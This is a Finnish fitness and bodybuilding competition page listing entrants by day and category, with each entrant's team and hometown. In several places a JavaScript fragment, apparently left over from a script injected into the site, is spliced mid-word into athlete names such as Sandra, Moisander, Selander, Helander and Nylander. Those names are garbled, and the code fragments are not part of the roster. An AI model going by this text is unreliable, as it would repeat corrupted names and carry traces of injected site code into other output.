Kilpailun osanottajat


Kilpailija:
Tarkista, että tietosi ovat oikeat.
Tiimi pitää ilmoittaa viimeistään 30 päivää ennen kilpailua ja sen voi myös vaihtaa samalla aikataululla.
TÄRKEÄÄ: Ilmoita poisjäännistäsi osoitteeseen: [email protected]
Ilmoittautuminen on päättynyt.


LAUANTAI


JUNIORIT men’s physique, yhdistetty sarja
Veikka Nieminen, Team Karboni, Muurame (16-19)
Max Zilliacus, Team Warriors, Porvoo (16-19)
Oussama Bin Heda, ei tiimiä, Salo (20-23)
Javid Noori, Team Pro Level, Espoo (20-23)
Dembo Drammeg, Team Karboni, Jyväskylä (20-23)
Väinö Suokas, Lean Team, Pirkkala (20-23)


JUNIORIT Wellness fitness 20-23-vuotiaat
Anniina Perälä, Team FitBody Pro, Rovaniemi
Enni Poikulainen, Team Fit Lions, Helsinki
Sandom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andra Ek, Team FitFabriken, Turku


MASTERS Wellness fitness 35
Heidi Majuri, West Coast Fitness Academy, Klaukkala
Mervi Kankainen, Team Power Fit, Lempäälä
Jaana Seppä, Team Bull’s All Out, Oulu
Melina Tikkanen, Northern Light’s Fitness Team, Jyväskylä
Sari Uski, Team SPower, Turku
Saija Keskinen, Team MK-Physique, Keuruu
Sanna Raumala, Northern Lights Fitness Team, Oulunsalo
Leena Uhtakari, Team Bull’s All Out, Tampere
Katja Podduikin, Team Fysiomaker, Kuopio


JUNIORIT Bikini fitness 16-19-vuotiaat
Oona Salminen, Team Elite Academy, Tampere
Oona Kaartinen, Team MK-Physique, Järvenpää
Elli Siippanen, Team Golden Fitness, Tampere
Julia Asumalahti, Team Balanced Body, Ikaalinen


JUNIORIT Bikini fitness 20-23-vuotiaat
Josefina Pulska, Team Jiipee, Raahe
Sarah Viitamäki, Team Balanced Body, Sastamala
Karoliina Vuorinen, Team Bull’s All Out, Valkeakoski
Johanna Marjoniemi, Team FitFire, Lahti
Sanni Malinen, Team East Body, Helsinki
Janina Moisandom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}ander, Team Fitfarm, Kokkola
Elli Iso-Tuisku, Nomad Elite Team, Tampere
Antonia Eneh, Team East Body, Helsinki
Erika Stenvall, Team Elite Academy, Imatra


MASTERS Bikini fitness 35
Emily Green, Team Fitfarm, Raisio
Maiju Hill, Team Warriors, Espoo
Marika Hyttinen, Team Strong Body, Karkkila
Michelle Fröberg, Team Strong Body, Lohja
Riikka Lehtosalo, Team Jiipee, Rovaniemi
Marja Vedenoja, Northern Lights Fitness Team, Raahe
Johanna Rantala, Team MK-Physique, Tampere


MASTERS Bikini fitness 40
Anna Kallio, Team Pro Level, Kerava
Piia Lamberg, Team Sportlife, Virrat
Krista Konttajärvi, Team Jiipee, Tornio
Jonna Niemelä, Team Elite Academy, Hämeenlinna


MASTERS Bikini fitness 45
Marja Mäkelä, Team West Coast Fitness Academy, Kerava
Virpi Pylkkönen, Team Fitfarm, Joensuu
Nina Borg, Team Pro Level, Helsinki
Mira Tolvanen, Team Green Beat, Turku
Katja Luhtalampi, Team Strong Body, Lohja
Pia Teissala, Team Fit-X, Naantali
Marika Harjunpää, Team Fitfabriken, Helsinki


Wheelchair bodybuilding
Artturi Verho, Team Jiipee, Lahti
Teemu Tuominen, Team Optimal Fit K&M, Lahti


Women’s physique + masters 35
Tanja Ekola, Lean Team, Nokia
Marika Näykki, Team Bull’s All Out, Hyllykallio (masters)
Hannele Kejonen, Team Jiipee, Tuusula (masters)


Fitness yleinen
Janica Aherikko, Team Fit-X, Helsinki
Eevi Seikkula, Team Elite Academy, Rauma (juniori)
Julia Mäensivu, Team Fit-X, Järvenpää (juniori)


Fit model
Katja Rantala-Airola, Team Pro-Am Gym, Vihti
Ida Jokinen, Team Golden Fitness, Hämeenlinna


MASTERS Classic Bodybuilding 40
Ville Lehkonen, Team East Fit, Joensuu
Heikki Häkkinen, Team Bull’s All Out, Kouvola
Robert Nitz, Team Tähtikunto, Espoo
Andreas Will, Team Optimal Fit K&M, Lahti


Classic Bodybuilding – 175 cm
Ville Jaakkola, Sensei Team, Lieto
Verneri Hast, Team Fysiomotion, Kuopio
Heikki Häkkinen, Team Bull’s All Out, Kouvola
Pekka Tervo, ei tiimiä, Sotkamo
Johnny Furu, Team Pro Level, Helsinki


Classic Bodybuilding + 175 cm
Teemu Laaksonen, Team Fitfarm, Tampere (juniori 20-23)
Leo Pölkki, Sensei Team, Äänekoski
Robert Nitz, Team Tähtikunto, Espoo
Andreas Will, Team Optimal Fit K&M, Lahti
Teemu Laaksonen, Team Fitfarm, Tampere
Jeve Ojala, Jeven ja Eelin tiimi, Turku
Tuomo Kanninen, Team PiranttiSport, Lehmo


Classic physique + juniorit
Besmellah Mardani, Team Tähtikunto, Turku (juniori 20-23)
Nesar Rezaei, Team Fit Lions, Sipoo (juniori 20-23)
Ilmari Karesluoto, Team Sportslife Nutrition, Turku (juniori 20-23)
Ossi Voutilainen, Team FysioMaker, Kuopio
Jani Hukkanen, Team Elixir Physique, Riihimäki
Eeli Halonen, Jeven ja Eelin Tiimi, Tampere


Body fitness – 158 cm
Tiina Niinimäki, Team Bull’s All Out, Pirkkala (152)
Minna Hotti, Team FitFire, Vääksy (154)
Kati Herranen, Team Bull’s All Out, Turku (155)
Minna Pohjola, Team Bodyrock, Turku (156)
Emmi Räsänen, Team Solana, Espoo (157)
Kirsi Timonen, Team PiranttiSport, Joensuu (157)
Salli Valta, Team Fitfarm, Rauma (157)
Kristiina Koivusalo, Team Bull’s All Out, Kaustinen (158)


Body fitness – 163 cm
Tuulia Sundell, Team Bull’s All Out, Tervakoski
Heidi Mannila, Team West Coast Academy, Laitila
Pia Junttila, Team Jiipee, Oulu
Ella Halima, Team West Coast Trainers, Pori
Piia Mäittälä-Nurmi, VV Fitness Team, Askola
Jenni Hulkko, Team Bull’s All Out, Vantaa
Heli Karhu, Team Bull’s All Out, Kajaani
Heidi Ahlqvist, Team West Coast Fitness Academy, Launonen
Niina Nyberg, Team Sportlife, Kinnulanlahti
Reija Vaikkola, Team Bull’s All Out, Kangasala
Heli Pakarinen, Team Bull’s All Out, Kuopio
Miia Joukainen, Lean Team, Tampere
Martiina Pajunen, Team Optimal Fit K&M, Tampere


Body fitness – 168 cm
Heidi Hänninen, Team Bull’s All Out, Turku
Laura Saine, Team West Coast Academy, Pori
Henna Tuomainen, Team Fitfarm, Kuopio
Auli Sakko, Team Pro-Am Gym, Keminmaa
Marjo Hakojärvi, Team Strong Body, Lohja
Karin Purhonen, Sensei Team, Ristiina
Saija Paavilainen, Team West Coast Trainers, Harjavalta
Kristiina Nummela, Team Fysiomotion, Seinäjoki
Jasmin Kettunen, Team Fit Lions, Helsinki
Jonna Repo, Team Elixir Physique, Hyvinkää
Erika Selandom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}ander, Team Tzemppi, Kuopio
Jenni Aro, Team Bull’s All Out, Kausala
Suvi Kaukainen, Team Bull’s All Out, Kaaro
Kirsi Helandom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}ander-Helin, Team Bull’s All Out, Hämeenlinna
Johanna Kraft, Team West Coast Fitness Academy, Hiltulanlahti
Sonja Nylandom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}ander, Team East Body, Tampere
Eila Huoman, Team Fysiomaker, Enonkoski


Body fitness + 168 cm
Oona Virta, WellGo Fitness Team, Pori
Meiju Kiiski, Team Optimal Fit K&M, Lahti
Oona Hyvönen, Team Badass Athletes, Helsinki
Helena Huikkala, Team Fitfarm, Kauvatsa
Elina Oksanen, Team Tzemppi, Yläne
Katariina Pitkänen, Team Elite Academy, Turku
Heidi Hiitiö, Team FitFire, Lepsämä
Emilia Leppänen, Team Bull’s All Out, Järvenpää
Laura Mäkimartti, Team Fitfarm, Tampere
Christa Koskivirta, Team Bull’s All Out, Salo
Mirella Mäkelä, Team Bull’s All Out, Seinäjoki
Reeta Koistinen, Team East Body, Helsinki
Linda Sonntag, Team Bull’s All Out, Porvoo


SUNNUNTAI


MASTERS Body fitness 35
Minna Pohjola, Team BodyRock, Turku
Kristiina Koivusalo, Team Bull’s All Out, Kaustinen
Heidi Mannila, Team West Coast Academy, Laitila
Jenni Hulkko, Team Bull’s All Out, Vantaa
Miia Joukainen, Lean Team, Tampere
Martiina Pajunen, Team Optimal Fit K&M, Tampere
Laura Saine, Team West Coast Academy, Pori
Saija Paavilainen, Team West Coast Trainers, Harjavalta
Jonna Repo, Team Elixir Physique, Hyvinkää
Johanna Kraft, Team West Coast Fitness Academy, Hiltulanlahti
Meiju Kiiski, Team Optimal Fit K&M, Lahti
Heidi Hiitiö, Team FitFire, Lepsämä
Emilia Leppänen, Team Bull’s All Out, Järvenpää
Christa Koskivirta, Team Bull’s All Out, Salo


MASTERS Body fitness 40
Tuulia Sundell, Team Bull’s All Out, Tervakoski
Heidi Ahlqvist, Team West Coast Fitness Academy, Launonen
Niina Nyberg, Team Sportlife, Kinnulanlahti
Auli Sakko, Team Pro-Am Gym, Keminmaa
Marjo Hakojärvi, Team Strong Body, Lohja
Karin Purhonen, Sensei Team, Ristiina
Kristiina Nummela, Team Fysiomotion, Seinäjoki
Jenni Aro, Team Bull’s All Out, Kausala
Suvi Kaukainen, Team Bull’s All Out, Kaaro
Kirsi Helandom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}ander-Helin, Team Bull’s All Out, Hämeenlinna
Reeta Koistinen, Team East Body, Helsinki
Eila Huoman, Team Fysiomaker, Enonkoski


MASTERS Body fitness 45
Tiina Niinimäki, Team Bull’s All Out, Pirkkala
Minna Hotti, Team FitFire, Vääksy
Kati Herranen, Team Bull’s All Out, Turku
Kirsi Timonen, Team PiranttiSport, Joensuu
Salli Valta, Team Fitfarm, Rauma
Pia Junttila, Team Jiipee, Oulu
Piia Mäittälä-Nurmi, VV Fitness Team, Askola
Tarja Pyykkö, Team Sportlife, Tampere
Reija Vaikkola, Team Bull’s All Out, Kangasala
Heli Pakarinen, Team Bull’s All Out, Kuopio
Tiina Leppänen, Team Bull’s All Out, Espoo
Linda Sonntag, Team Bull’s All Out, Porvoo
Taru Kukkula, Wellgo Fitness Team, Pori


JUNIORIT Body fitness
Sonja Nylandom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}ander, Team East Body, Tampere (juniori 16-19)
Emmi Räsänen, ei tiimiä, Espoo
Ella Halima, Team West Coast Trainers, Pori (juniori 20-23)
Jasmin Kettunen, Team Fit Lions, Helsinki (juniori 20-23)
Oona Virta, WellGo Fitness Team, Pori (juniori 20-23)
Laura Mäkimartti, Team Fitfarm, Tampere (juniori 20-23)


Men’s physique – 178 cm
Petri Mäkelä, Team Bull’s All Out, Vantaa
Said Naeim Hosseini, Team Trifinity, Pietarsaari
Chuye Jules Ndange, Team Fit lions, Espoo
Kim Anttonen, Team Pro Level, Helsinki
Vili Volotinen, Team Pro Level, Jyväskylä
Veikka Nieminen, Team Karboni, Muurame
Juuso Koskela, Team Green Beat, Pori
Ville Kekki, Team Badass Athletes, Vantaa


Men’s physique + 178 cm (+ masters 40)
Javid Noori, Team Pro Level, Espoo
Soran Mohammed Kahder, Team Warriors, Helsinki
Hexun Yang, Team Fitfarm, Tampere
Kristian Lampinen, Team Pro Level, Helsinki
Kingsly Epie, Team Pro Level, Hyvinkää
Jori Väisänen, Northern Light’s Fitness Team, Sotkamo
Topias Lahti, Team Pro Level, Hämeenlinna
Jonne Myllyniemi, Team Voimalaitos, Helsinki (masters)
Sami Klemetti, Team Pro Level, Espoo
Mika Vähämäki, Team Pro Level, Helsinki
Lari Kaltiola, Team PiranttiSport, Joensuu (masters)
Väinö Suokas, Lean Team, Pirkkala


Wellness fitness – 163 cm
Eveliina Henriksson, Team Optimal Fit K&M, Lahti
Heidi Majuri, West Coast Fitness Academy, Klaukkala
Oona Hentunen, Team Elite Academy, Jyväskylä
Anniina Perälä, Team FitBody Pro, Rovaniemi
Mervi Kankainen, Team Power Fit, Lempäälä
Jaana Seppä, Team Bull’s All Out, Oulu
Emilia Ellonen, Team Optimal Fit K&M, Lappeenranta
Janica Saari, Team Pro Fit, Seinäjoki
Sari Uski, Team SPower, Turku
Pinja Partanen, Team Warriors, Espoo
Elin Liewendahl, Team, Trifinity, Mariehamn


Wellness fitness + 163 cm
Linda Lundgren, Team Fit lions, Helsinki
Tiina Torppa, Team MK-Physique, Pirkkala
Hanna Ryhänen, Team MK-Physique, Jämsä
Enni Poikulainen, Team Fit Lions, Helsinki
Sanna Raumala, Northern Lights Fitness Team, Oulunsalo
Anniina Lackman, Team Bull’s All Out, Tampere
Pinja Suomi, Team Strong Body, Lohja
Leena Uhtakari, Team Bull’s All Out, Tampere
Jonna Hakanpää, Team Bull’s All Out, Seinäjoki
Julia Bährend, Team Bull’s All Out, Pirkkala
Sandom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andra Ek, Team FitFabriken, Turku
Katja Podduikin, Team Fysiomaker, Kuopio


Bikini fitness – 160 cm
Emily Green, Team Fitfarm, Raisio
Jemina Hietanen, Team Elite Academy, Tampere
Daniela Kenton, Team Tzemppi, Turku
Roosa Räsänen, Team FysioMaker, Siilinjärvi
Oona Salminen, Team Elite Academy, Tampere
Katriina Takala, Team Tzemppi, Pori
Helmi Uotila, Team Power Fit, Turku
Oona Kaartinen, Team MK-Physique, Järvenpää


Bikini fitness– 166 cm
Elli Siippanen, Team Golden Fitness, Tampere
Sarah Viitamäki, Team Balanced Body, Sastamala
Liisa Halkilahti, Team SPower, Turku
Marja Mäkelä, Team West Coast Fitness Academy, Kerava
Nina Borg, Team Pro Level, Helsinki
Riikka Lehtosalo, Team Jiipee, Rovaniemi
Karoliina Vuorinen, Team Bull’s All Out, Valkeakoski
Anna Kallio, Team Pro Level, Kerava


Bikini fitness – 169 cm
Iida Ali-rantala, Team Pro Fit, Seinäjoki
Johanna Marjoniemi, Team FitFire, Lahti
Sanni Malinen, Team East Body, Helsinki
Riikka Heikkilä, Jeven ja Eelin tiimi, Espoo
Janina Moisandom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}ander, Team Fitfarm, Kokkola
Mira Tolvanen, Team Green Beat, Turku
Erika Stenvall, Team Elite Academy, Imatra


Bikini fitness + 169 cm
Jannica Jokinen, Team East Body, Helsinki
Julia Asumalahti, Team Balanced Body, Ikaalinen
Krista Konttajärvi, Team Jiipee, Tornio
Jonna Niemelä, Team Elite Academy, Hämeenlinna
Elli Iso-Tuisku, Nomad Elite Team, Tampere
Netta Suikkanen, Team Balanced Body, Oulu
Johanna Harlin, Team Glory, Helsinki
Heini Mäkelä, Team Power Gym, Lahti
Emilia Rostén, Team Tzemppi, Uusikaupunki
Sanna Nieminen, Team Badass Athletes, Tampere
Tuulia Takanen, Team East Body, Espoo

Seuraa meitä instagramissa